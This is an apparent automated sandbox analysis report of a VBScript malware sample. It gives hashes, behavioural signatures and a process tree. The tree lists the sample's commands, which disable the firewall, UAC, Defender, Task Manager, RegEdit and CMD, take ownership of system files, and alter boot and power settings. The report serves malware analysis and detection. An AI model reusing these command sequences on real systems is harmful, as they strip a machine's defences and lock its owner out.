Analysis
-
max time kernel
284s -
max time network
279s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 15:20
Static task
static1
Behavioral task
behavioral1
Sample
malware.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
malware.vbs
Resource
win10v2004-20240226-en
Errors
General
-
Target
malware.vbs
-
Size
5KB
-
MD5
97b26482ceb60d0f7cddfc0ca528f9ef
-
SHA1
0aa4343f9a757f864d617279fa4766b0a38ce72f
-
SHA256
48db7f40db76b3820b5c47d30f4cb99b79e755cbf61dddd6f2012f26eea52c9a
-
SHA512
5d1a5ee7ea521ceff427c402527bfba365579e25892a029d0d9ed77fe4b22c453c18fe48e24d275e090c00d2efb2e0adcf753e1658b2c061de61ea52b43c1af0
-
SSDEEP
96:qD5YNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/MNa:qD5YqrZgX7yrCdPidfbU0a
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 2584 bcdedit.exe 1864 bcdedit.exe 1156 bcdedit.exe 1440 bcdedit.exe -
Creates new service(s) 2 TTPs
-
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 700 netsh.exe 2460 netsh.exe -
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 2412 takeown.exe 3132 icacls.exe 4364 takeown.exe 1436 icacls.exe 2360 takeown.exe 2184 icacls.exe 2556 takeown.exe 2088 icacls.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 2184 icacls.exe 2556 takeown.exe 2088 icacls.exe 2412 takeown.exe 3132 icacls.exe 4364 takeown.exe 1436 icacls.exe 2360 takeown.exe -
Drops file in System32 directory 19 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db OpenWith.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 1352 sc.exe 2060 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exepid process 4616 ipconfig.exe 3600 ipconfig.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2932 taskkill.exe 2192 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
LogonUI.exereg.exereg.exeOpenWith.execmd.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exeOpenWith.exereg.exeOpenWith.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer cmd.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dac0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix cmd.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\International\sLanguage = "rus" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" cmd.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached cmd.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000d67b69c000aada01 cmd.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\International reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System reg.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{4234D49B-0245-4DF3-B780-3893943456E1} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008bf97dc100aada01 OpenWith.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" cmd.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached OpenWith.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "221" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{B7308E23-BF31-4212-BB8A-CA5B11D9C512} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{41B39822-E41D-43EC-9C0D-4B7162BC9910} msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
taskmgr.exepid process 2168 taskmgr.exe 2168 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
msedge.exepid process 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
7zG.exetaskmgr.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetaskkill.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exeshutdown.exedescription pid process Token: SeRestorePrivilege 4896 7zG.exe Token: 35 4896 7zG.exe Token: SeDebugPrivilege 2168 taskmgr.exe Token: SeSystemProfilePrivilege 2168 taskmgr.exe Token: SeCreateGlobalPrivilege 2168 taskmgr.exe Token: 33 2168 taskmgr.exe Token: SeIncBasePriorityPrivilege 2168 taskmgr.exe Token: SeShutdownPrivilege 3224 powercfg.exe Token: SeCreatePagefilePrivilege 3224 powercfg.exe Token: SeShutdownPrivilege 3696 powercfg.exe Token: SeCreatePagefilePrivilege 3696 powercfg.exe Token: SeShutdownPrivilege 2904 powercfg.exe Token: SeCreatePagefilePrivilege 2904 powercfg.exe Token: SeShutdownPrivilege 1248 powercfg.exe Token: SeCreatePagefilePrivilege 1248 powercfg.exe Token: SeDebugPrivilege 2192 taskkill.exe Token: SeDebugPrivilege 1648 whoami.exe Token: SeTakeOwnershipPrivilege 2556 takeown.exe Token: SeShutdownPrivilege 1440 powercfg.exe Token: SeCreatePagefilePrivilege 1440 powercfg.exe Token: SeShutdownPrivilege 1156 powercfg.exe Token: SeCreatePagefilePrivilege 1156 powercfg.exe Token: SeShutdownPrivilege 2248 powercfg.exe Token: SeCreatePagefilePrivilege 2248 powercfg.exe Token: SeShutdownPrivilege 496 powercfg.exe Token: SeCreatePagefilePrivilege 496 powercfg.exe Token: SeDebugPrivilege 3304 whoami.exe Token: SeTakeOwnershipPrivilege 2412 takeown.exe Token: SeTakeOwnershipPrivilege 4364 takeown.exe Token: SeTakeOwnershipPrivilege 2360 takeown.exe Token: SeShutdownPrivilege 3396 shutdown.exe Token: SeRemoteShutdownPrivilege 3396 shutdown.exe -
Suspicious use of FindShellTrayWindow 53 IoCs
Processes:
taskmgr.exemsedge.exepid process 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe -
Suspicious use of SendNotifyMessage 51 IoCs
Processes:
taskmgr.exemsedge.exepid process 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 2168 taskmgr.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe 3276 msedge.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exeLogonUI.exepid process 4004 OpenWith.exe 3088 OpenWith.exe 832 OpenWith.exe 4460 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exenet.exedescription pid process target process PID 1408 wrote to memory of 2932 1408 cmd.exe taskkill.exe PID 1408 wrote to memory of 2932 1408 cmd.exe taskkill.exe PID 3660 wrote to memory of 3816 3660 cmd.exe net.exe PID 3660 wrote to memory of 3816 3660 cmd.exe net.exe PID 3816 wrote to memory of 2372 3816 net.exe net1.exe PID 3816 wrote to memory of 2372 3816 net.exe net1.exe PID 3660 wrote to memory of 3224 3660 cmd.exe powercfg.exe PID 3660 wrote to memory of 3224 3660 cmd.exe powercfg.exe PID 3660 wrote to memory of 3696 3660 cmd.exe powercfg.exe PID 3660 wrote to memory of 3696 3660 cmd.exe powercfg.exe PID 3660 wrote to memory of 2904 3660 cmd.exe powercfg.exe PID 3660 wrote to memory of 2904 3660 cmd.exe powercfg.exe PID 3660 wrote to memory of 1248 3660 cmd.exe powercfg.exe PID 3660 wrote to memory of 1248 3660 cmd.exe powercfg.exe PID 3660 wrote to memory of 2460 3660 cmd.exe netsh.exe PID 3660 wrote to memory of 2460 3660 cmd.exe netsh.exe PID 1408 wrote to memory of 2192 1408 cmd.exe taskkill.exe PID 1408 wrote to memory of 2192 1408 cmd.exe taskkill.exe PID 3660 wrote to memory of 4460 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4460 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4280 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4280 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2964 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2964 3660 cmd.exe reg.exe PID 3660 wrote to memory of 5080 3660 cmd.exe reg.exe PID 3660 wrote to memory of 5080 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2412 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2412 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4300 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4300 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2120 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2120 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2204 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2204 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2556 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2556 3660 cmd.exe reg.exe PID 3660 wrote to memory of 1544 3660 cmd.exe reg.exe PID 3660 wrote to memory of 1544 3660 cmd.exe reg.exe PID 3660 wrote to memory of 3852 3660 cmd.exe reg.exe PID 3660 wrote to memory of 3852 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2376 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2376 3660 cmd.exe reg.exe PID 3660 wrote to memory of 548 3660 cmd.exe reg.exe PID 3660 wrote to memory of 548 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4988 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4988 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4400 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4400 3660 cmd.exe reg.exe PID 3660 wrote to memory of 1348 3660 cmd.exe reg.exe PID 3660 wrote to memory of 1348 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4416 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4416 3660 cmd.exe reg.exe PID 3660 wrote to memory of 3892 3660 cmd.exe reg.exe PID 3660 wrote to memory of 3892 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4928 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4928 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4420 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4420 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2652 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2652 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4348 3660 cmd.exe reg.exe PID 3660 wrote to memory of 4348 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2876 3660 cmd.exe reg.exe PID 3660 wrote to memory of 2876 3660 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap18481:94:7zEvent10232 -ad -saa -- "C:\Users\Admin\AppData\Local\Temp\malware"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /im archive.bat2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\archive.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
